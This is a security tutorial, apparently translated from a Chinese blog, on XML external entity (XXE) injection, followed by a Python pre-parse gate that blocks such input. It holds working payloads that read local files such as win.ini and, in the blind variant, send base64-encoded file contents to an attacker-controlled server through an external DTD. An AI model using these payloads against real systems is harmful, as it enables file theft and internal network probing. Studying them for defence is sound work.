XXE (XML external entity) injection: vulnerability attack and defense test

Vulnerability attack and defense test

Overview

Using an XXE vulnerability, an attacker can carry out denial-of-service (DoS) attacks, read files, execute commands or code (only when PHP has been compiled and installed together with the command-execution module), perform SQL (XSS) injection, scan internal and external ports (remote inclusion vulnerability), break into intranet sites, and so on. Intranet detection and intrusion use the protocols supported by XXE to discover intranet hosts and ports. In short, XXE can be used for SSRF, and basically everything SSRF can do is possible.

Generally, XXE exploitation falls into two scenarios: with echo and without echo. With echo, the result or effect of the payload can be seen directly on the page. Without echo (also called blind XXE), the data has to be extracted through an out-of-band data channel.

With echo

<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>

<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;]>
<foo>&evil;</foo>

Content of the external evil.dtd:

<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >

Without echo

Use an out-of-band data channel: first use php://filter to read the contents of the target file, then send the contents to the data-receiving server (the attacker's VPS) xxx.xxx.xxx.

<!DOCTYPE convert [<!ENTITY % remote SYSTEM "http://ip/test.dtd">%remote;%int;%send;]>

If the parser reports an error, the error message can be viewed directly. If it does not, check the access log on the server that receives the data: it contains the data base64-encoded, and decoding it yields the original content.
The server has clearly received the sensitive file content that we encoded with base64 (the encoding is needed so the file content does not break the XML syntax; without encoding, the parser reports an error).

The whole calling process

In the payload, the three parameter entities %remote; %int; %send; are called in turn, and this order matters. %remote is called first and requests test.dtd from the remote server, somewhat like including test.dtd. Then %int calls %file inside test.dtd; %file reads the sensitive file on the server, and its result is filled into %send (because a literal % may not appear inside an entity value, it is written as the character reference &#37;). Finally %send; sends the data we read to our remote VPS. This achieves out-of-band data extraction and solves the problem of XXE without echo.
In test.dtd, the inner % must be written as the character reference &#37; (note: for the encoding, see http://www.mamicode.com/info-detail-1680849.html).

<!ENTITY % file SYSTEM
"php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM'http://192.168.0.105:8080?p=%file;'>">
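As an added example (not code from the original post), here is a Python pre-parse gate that rejects every payload variant shown above before any XML parser sees it, plus a check of what the standard library's ElementTree does with the echo payload. The sample documents are constructed from the payloads in the text; the function names are my own.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples (not from the post): the echo payload, the blind payload
# and a test.dtd like the one above, plus a benign document an endpoint expects.
PAYLOAD_ECHO = '''<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>'''
PAYLOAD_BLIND = ('<!DOCTYPE convert [<!ENTITY % remote SYSTEM '
                 '"http://ip/test.dtd">%remote;%int;%send;]>')
TEST_DTD = '''<!ENTITY % file SYSTEM
"php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM'http://192.168.0.105:8080?p=%file;'>">'''
BENIGN = '<?xml version="1.0"?><order><id>42</id></order>'

DOCTYPE_RE = re.compile(r'<!DOCTYPE\b', re.IGNORECASE)
# <!ENTITY [%] name [SYSTEM|PUBLIC] "value"; DOTALL since test.dtd wraps lines.
ENTITY_RE = re.compile(
    r'''<!ENTITY\s+(%)?\s*([^\s"'>]+)\s+(?:(SYSTEM|PUBLIC)\s*)?(["'])(.*?)\4''',
    re.IGNORECASE | re.DOTALL)

def xxe_findings(xml_text):
    """(kind, name, scheme) tuples describing why a document must be rejected.
    Every variant above needs a DOCTYPE, so an inline DTD alone is enough."""
    findings = []
    if DOCTYPE_RE.search(xml_text):
        findings.append(("doctype", None, None))
    for is_param, name, keyword, _quote, value in ENTITY_RE.findall(xml_text):
        scheme = None
        if keyword.upper() == "SYSTEM" and ":" in value:
            scheme = value.split(":", 1)[0].lower()   # file, http, php, ...
        findings.append(("parameter" if is_param else "general", name, scheme))
    return findings

def parse_untrusted(xml_text):
    """Gate for untrusted input: (root, []) if clean, else (None, findings)."""
    findings = xxe_findings(xml_text)
    if findings:
        return None, findings
    return ET.fromstring(xml_text), []

def stdlib_outcome(xml_text):
    """ElementTree never resolves external entities: the echo payload fails
    with 'undefined entity &xxe;' rather than leaking win.ini."""
    try:
        ET.fromstring(xml_text)
        return "parsed"
    except ET.ParseError:
        return "refused"
```

The gate logs which scheme an entity points at (file, http, php) so a blocked request is still useful as a detection signal.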

Source: blog.csdn.net/weixin_43079958/article/details/105476599